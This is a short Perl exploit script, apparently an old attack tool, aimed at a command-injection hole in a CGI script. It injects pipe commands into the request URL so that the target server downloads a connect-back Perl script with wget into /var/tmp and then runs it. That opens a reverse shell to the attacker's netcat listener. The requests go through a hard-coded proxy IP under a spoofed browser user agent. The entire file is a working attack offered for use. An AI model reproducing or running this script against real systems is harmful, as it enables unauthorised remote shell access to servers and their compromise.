#!/usr/bin/perl
#

use LWP::UserAgent;
use HTTP::Message;

if(!$ARGV[4])
{
print "\n";
print "Exploits CGI-HOLE Coded By Ph03n1X\n";
print "Thx to y3dips\n";
print "Using connect-back method AresU 1stlink\n";
print "\n";
print "Usage = perl xplocgi.pl <host> <vulnerable path> <your_host> <your_listen_port> <link_connect_back>\n";
print "On your Box with public ip execute -#nc -l <your_listen_port>\n\n";
exit(0);
}

$serv=$ARGV[0];
$vuln=$ARGV[1];
$aku=$ARGV[2];
$portku=$ARGV[3];
$link=$ARGV[4];

$prox='http://222.124.24.23:3128';

$browse = LWP::UserAgent->new;
$browse -> timeout(100);
$browse -> agent("MSIE/6.0 Windows");
$browse -> proxy(http=>$prox) if defined($prox);

$vulnurl = "http://$serv$vuln|wget $link -O /var/tmp/jancuk.pl|";
print "\n$vulnurl\nSEDANG DI PROSES\n\n";
$request = $browse->get($vulnurl);
if(!($request->is_success))
{
print($request->status_line."Gagal\n");
exit(0);
}
$conback = "http://$serv$vuln|perl /var/tmp/jancuk.pl $aku $portku|";
print "\nKoneksi balik sedang dilakukan\n$conback\n\n";
$request2 = $browse->get($conback);
if(!($request2->is_success))
{
print($request->status_line."Gagal\n");
exit(0);
}

print "See your box NOW\n";
print "IF you don't see the victim shell, it means exploitation failed\n\n";